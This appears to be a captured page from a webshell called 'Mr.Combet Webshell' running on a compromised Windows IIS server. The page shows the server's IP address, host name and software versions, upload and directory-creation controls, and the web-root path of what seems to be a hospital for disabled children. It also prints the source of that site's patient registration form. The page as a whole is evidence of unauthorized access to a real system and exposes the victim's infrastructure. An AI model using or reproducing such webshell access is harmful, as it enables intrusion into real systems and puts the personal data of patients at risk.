Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
HRDC
/
HRDC
/
Views
/
Home
/
View File Name :
PRTRegistration.cshtml
@model HRDC.Models.PRTRegistrationForm @{ ViewBag.Title = "HRDC-HOSPITAL & REHABILITATION for DISABLED CHILDREN::PRT Registration"; Layout = "~/Views/Shared/DetailLayout.cshtml"; } @using (Html.BeginForm("Index", "PRTRegsitration", FormMethod.Post)) { @Html.AntiForgeryToken() @Html.ValidationSummary(true, "", new { @class = "text-danger" }) <div class="panel panel-primary"> <div class="panel-body"> <label style="font-style:italic;font-family:'Times New Roman', Times, serif;margin-left:200px"><u>@ViewBag.MailMsg</u></label> <div class="form-group"> @Html.LabelFor(model => model.FullName, new { style = "padding-right:40px;" }) @Html.TextBoxFor(model => model.FullName, new { style = "width:400px" })@Html.ValidationMessageFor(model => model.FullName, "", new { @class = "text-danger" }) </div> <div class="form-group"> @Html.LabelFor(model => model.Age, new { style = "padding-right:77px" }) @Html.TextBoxFor(model => model.Age, new { style = "width:400px" })@Html.ValidationMessageFor(model => model.Age, "", new { @class = "text-danger" }) </div> <div class="form-group"> @Html.LabelFor(model => model.Sex, new { style = "padding-right:78px" }) @Html.TextBoxFor(model => model.Sex, new { style = "width:400px" })@Html.ValidationMessageFor(model => model.Sex, "", new { @class = "text-danger" }) </div> <div class="form-group"> @Html.LabelFor(model => model.Address, new { style = "padding-right:55px" }) @Html.TextBoxFor(model => model.Address, new { style = "width:400px" }) </div> <div class="form-group"> @Html.LabelFor(model => model.PhoneNumber, new { style = "padding-right:35px" }) @Html.TextBoxFor(model => model.PhoneNumber, new { style = "width:400px" })@Html.ValidationMessageFor(model => model.PhoneNumber, "", new { @class = "text-danger" }) </div> <div class="form-group"> @Html.LabelFor(model => model.Email, new { style = "padding-right:65px" }) @Html.TextBoxFor(model => model.Email, new { style = "width:400px" })@Html.ValidationMessageFor(model => model.Email, "", new { @class = "text-danger" }) </div> <div class="form-group"> @Html.LabelFor(model => model.Remarks, new { style = "padding-right:50px" }) @Html.TextAreaFor(model => model.Remarks, new { style = "width:400px;", rows = 3 }) </div> <div style="margin-left:108px"> @*local*@ @*<div class="g-recaptcha" data-sitekey="6LdUDGcUAAAAAM9jCNimaJWGpOzlnm58aNLGcOYC"></div>*@ @*server*@ <div class="g-recaptcha" data-sitekey="6LeqC2cUAAAAANNd7vj84-2WGO8i44Dow0SeYLPw"></div> </div> <br /> <input type="submit" value="Submit" class="btn-blue-fill btn" /> @Html.LabelFor(model => model.EmailStatus, new { style = "padding-right:44px" }) </div> </div> }